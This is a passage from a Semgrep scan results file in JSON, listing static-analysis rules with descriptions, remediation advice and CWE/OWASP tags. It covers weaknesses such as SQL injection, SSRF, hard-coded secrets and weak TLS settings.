resources."},"helpUri":"https://semgrep.dev/r/terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure","id":"terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure","name":"terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Using a .NET remoting service can lead to RCE, even if you try to configure TypeFilterLevel. Recommended to switch from .NET Remoting to WCF https://docs.microsoft.com/en-us/dotnet/framework/wcf/migrating-from-net-remoting-to-wcf"},"help":{"markdown":"Using a .NET remoting service can lead to RCE, even if you try to configure TypeFilterLevel. Recommended to switch from .NET Remoting to WCF https://docs.microsoft.com/en-us/dotnet/framework/wcf/migrating-from-net-remoting-to-wcf\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.runtime.serialization.formatters.typefilterlevel?view=net-6.0](https://docs.microsoft.com/en-us/dotnet/api/system.runtime.serialization.formatters.typefilterlevel?view=net-6.0)\n - [https://www.synacktiv.com/en/publications/izi-izi-pwn2own-ics-miami.html](https://www.synacktiv.com/en/publications/izi-izi-pwn2own-ics-miami.html)\n","text":"Using a .NET remoting service can lead to RCE, even if you try to configure TypeFilterLevel. Recommended to switch from .NET Remoting to WCF https://docs.microsoft.com/en-us/dotnet/framework/wcf/migrating-from-net-remoting-to-wcf"},"helpUri":"https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full","id":"csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full","name":"csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in PHP, it is possible to adopt prepared statements by using `PDO` with bind variables using `bindParam()`."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in PHP, it is possible to adopt prepared statements by using `PDO` with bind variables using `bindParam()`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in PHP, it is possible to adopt prepared statements by using `PDO` with bind variables using `bindParam()`."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection","id":"php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection","name":"php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Path traversal may allow malicious actors to access file content not intended to be exposed to them. For example a user may be able to access sensitive secrets stored within app files (e.g. UserDefaults/Plists/.etc.). Alternatively, users with access to a victim's phone may be able to obtain senstivie data persisted by the application."},"help":{"markdown":"Path traversal may allow malicious actors to access file content not intended to be exposed to them. For example a user may be able to access sensitive secrets stored within app files (e.g. UserDefaults/Plists/.etc.). Alternatively, users with access to a victim's phone may be able to obtain senstivie data persisted by the application.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal)\n - [https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html](https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html)\n","text":"Path traversal may allow malicious actors to access file content not intended to be exposed to them. For example a user may be able to access sensitive secrets stored within app files (e.g. UserDefaults/Plists/.etc.). Alternatively, users with access to a victim's phone may be able to obtain senstivie data persisted by the application."},"helpUri":"https://semgrep.dev/r/swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal","id":"swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal","name":"swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal","properties":{"precision":"very-high","tags":["CWE-35: Path Traversal","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.sqlx.pg-connection-url.pg-connection-url)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.sqlx.pg-connection-url.pg-connection-url","id":"rust.secrets.sqlx.pg-connection-url.pg-connection-url","name":"rust.secrets.sqlx.pg-connection-url.pg-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.sqlx.pg-connection-url.pg-connection-url"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure EBS Volume is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure EBS Volume is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Ensure EBS Volume is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk","id":"terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk","name":"terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Azure Storage currently supports three versions of the TLS protocol: 1.0, 1.1, and 1.2. Azure Storage uses TLS 1.2 on public HTTPS endpoints, but TLS 1.0 and TLS 1.1 are still supported for backward compatibility. This check will warn if the minimum TLS is not set to TLS1_2."},"help":{"markdown":"Azure Storage currently supports three versions of the TLS protocol: 1.0, 1.1, and 1.2. Azure Storage uses TLS 1.2 on public HTTPS endpoints, but TLS 1.0 and TLS 1.1 are still supported for backward compatibility. This check will warn if the minimum TLS is not set to TLS1_2.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy)\n - [https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/storage_account#min_tls_version](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/storage_account#min_tls_version)\n - [https://docs.microsoft.com/en-us/azure/storage/common/transport-layer-security-configure-minimum-version](https://docs.microsoft.com/en-us/azure/storage/common/transport-layer-security-configure-minimum-version)\n","text":"Azure Storage currently supports three versions of the TLS protocol: 1.0, 1.1, and 1.2. Azure Storage uses TLS 1.2 on public HTTPS endpoints, but TLS 1.0 and TLS 1.1 are still supported for backward compatibility. This check will warn if the minimum TLS is not set to TLS1_2."},"helpUri":"https://semgrep.dev/r/terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy","id":"terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy","name":"terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 210K iterations should be used with SHA512"},"help":{"markdown":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 210K iterations should be used with SHA512\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n - [https://pages.nist.gov/800-63-3/sp800-63b.html#sec5](https://pages.nist.gov/800-63-3/sp800-63b.html#sec5)\n","text":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 210K iterations should be used with SHA512"},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512","id":"swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512","name":"swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512","properties":{"precision":"very-high","tags":["CWE-916: Use of Password Hash With Insufficient Computational Effort","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Function sweepToken is allowed to be called by anyone"},"help":{"markdown":"Function sweepToken is allowed to be called by anyone\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted)\n - [https://medium.com/chainsecurity/trueusd-compound-vulnerability-bc5b696d29e2](https://medium.com/chainsecurity/trueusd-compound-vulnerability-bc5b696d29e2)\n - [https://chainsecurity.com/security-audit/compound-ctoken/](https://chainsecurity.com/security-audit/compound-ctoken/)\n - [https://blog.openzeppelin.com/compound-comprehensive-protocol-audit/](https://blog.openzeppelin.com/compound-comprehensive-protocol-audit/)\n - [https://etherscan.io/address/0xa035b9e130f2b1aedc733eefb1c67ba4c503491f](https://etherscan.io/address/0xa035b9e130f2b1aedc733eefb1c67ba4c503491f)\n","text":"Function sweepToken is allowed to be called by anyone"},"helpUri":"https://semgrep.dev/r/solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted","id":"solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted","name":"solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can."},"help":{"markdown":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.xpath.tainted-xpath.tainted-xpath)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can."},"helpUri":"https://semgrep.dev/r/java.spring.xpath.tainted-xpath.tainted-xpath","id":"java.spring.xpath.tainted-xpath.tainted-xpath","name":"java.spring.xpath.tainted-xpath.tainted-xpath","properties":{"precision":"very-high","tags":["CWE-643: Improper Neutralization of Data within XPath Expressions ('XPath Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.xpath.tainted-xpath.tainted-xpath"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi)\n - [https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text](https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection."},"helpUri":"https://semgrep.dev/r/python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi","id":"python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi","name":"python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep)\n - [https://cwe.mitre.org/data/definitions/918.html](https://cwe.mitre.org/data/definitions/918.html)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/)\n - [https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fauth~2Fssrf~2Fgeneric](https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fauth~2Fssrf~2Fgeneric)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep","id":"java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep","name":"java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims."},"help":{"markdown":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims."},"helpUri":"https://semgrep.dev/r/ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify","id":"ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify","name":"ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify","properties":{"precision":"very-high","tags":["CWE-345: Insufficient Verification of Data Authenticity","LOW CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"You should probably use Filename.get_temp_dirname()."},"help":{"markdown":"You should probably use Filename.get_temp_dirname().\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ocaml.lang.portability.slash-tmp.not-portable-tmp-string)\n","text":"You should probably use Filename.get_temp_dirname()."},"helpUri":"https://semgrep.dev/r/ocaml.lang.portability.slash-tmp.not-portable-tmp-string","id":"ocaml.lang.portability.slash-tmp.not-portable-tmp-string","name":"ocaml.lang.portability.slash-tmp.not-portable-tmp-string","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: ocaml.lang.portability.slash-tmp.not-portable-tmp-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This location block contains a 'proxy_pass' directive but does not contain the 'internal' directive. The 'internal' directive restricts access to this location to internal requests. Without 'internal', an attacker could use your server for server-side request forgeries (SSRF). Include the 'internal' directive in this block to limit exposure."},"help":{"markdown":"This location block contains a 'proxy_pass' directive but does not contain the 'internal' directive. The 'internal' directive restricts access to this location to internal requests. Without 'internal', an attacker could use your server for server-side request forgeries (SSRF). Include the 'internal' directive in this block to limit exposure.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.missing-internal.missing-internal)\n - [https://github.com/yandex/gixy/blob/master/docs/en/plugins/ssrf.md](https://github.com/yandex/gixy/blob/master/docs/en/plugins/ssrf.md)\n - [https://nginx.org/en/docs/http/ngx_http_core_module.html#internal](https://nginx.org/en/docs/http/ngx_http_core_module.html#internal)\n","text":"This location block contains a 'proxy_pass' directive but does not contain the 'internal' directive. The 'internal' directive restricts access to this location to internal requests. Without 'internal', an attacker could use your server for server-side request forgeries (SSRF). Include the 'internal' directive in this block to limit exposure."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.missing-internal.missing-internal","id":"generic.nginx.security.missing-internal.missing-internal","name":"generic.nginx.security.missing-internal.missing-internal","properties":{"precision":"very-high","tags":["CWE-16: CWE CATEGORY: Configuration","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.missing-internal.missing-internal"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found an insecure gRPC connection. This creates a connection without encryption to a gRPC client/server. A malicious attacker could tamper with the gRPC message, which could compromise the machine."},"help":{"markdown":"Found an insecure gRPC connection. This creates a connection without encryption to a gRPC client/server. A malicious attacker could tamper with the gRPC message, which could compromise the machine.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection)\n - [https://blog.gopheracademy.com/advent-2017/go-grpc-beyond-basics/#:~:text=disables%20transport%20security](https://blog.gopheracademy.com/advent-2017/go-grpc-beyond-basics/#:~:text=disables%20transport%20security)\n","text":"Found an insecure gRPC connection. This creates a connection without encryption to a gRPC client/server. A malicious attacker could tamper with the gRPC message, which could compromise the machine."},"helpUri":"https://semgrep.dev/r/javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection","id":"javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection","name":"javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for cases where java applications are allowing unsafe renegotiation. This leaves the application vulnerable to a man-in-the-middle attack where chosen plain text is injected as prefix to a TLS connection."},"help":{"markdown":"Checks for cases where java applications are allowing unsafe renegotiation. This leaves the application vulnerable to a man-in-the-middle attack where chosen plain text is injected as prefix to a TLS connection.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation)\n - [https://www.oracle.com/java/technologies/javase/tlsreadme.html](https://www.oracle.com/java/technologies/javase/tlsreadme.html)\n","text":"Checks for cases where java applications are allowing unsafe renegotiation. This leaves the application vulnerable to a man-in-the-middle attack where chosen plain text is injected as prefix to a TLS connection."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation","id":"problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation","name":"problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret","id":"csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret","name":"csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The call to 'createDecipheriv' with the Galois Counter Mode (GCM) mode of operation is missing an expected authentication tag length. If the expected authentication tag length is not specified or otherwise checked, the application might be tricked into verifying a shorter-than-expected authentication tag. This can be abused by an attacker to spoof ciphertexts or recover the implicit authentication key of GCM, allowing arbitrary forgeries."},"help":{"markdown":"The call to 'createDecipheriv' with the Galois Counter Mode (GCM) mode of operation is missing an expected authentication tag length. If the expected authentication tag length is not specified or otherwise checked, the application might be tricked into verifying a shorter-than-expected authentication tag. This can be abused by an attacker to spoof ciphertexts or recover the implicit authentication key of GCM, allowing arbitrary forgeries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length)\n - [https://www.securesystems.de/blog/forging_ciphertexts_under_Galois_Counter_Mode_for_the_Node_js_crypto_module/](https://www.securesystems.de/blog/forging_ciphertexts_under_Galois_Counter_Mode_for_the_Node_js_crypto_module/)\n - [https://nodejs.org/api/crypto.html#cryptocreatedecipherivalgorithm-key-iv-options](https://nodejs.org/api/crypto.html#cryptocreatedecipherivalgorithm-key-iv-options)\n - 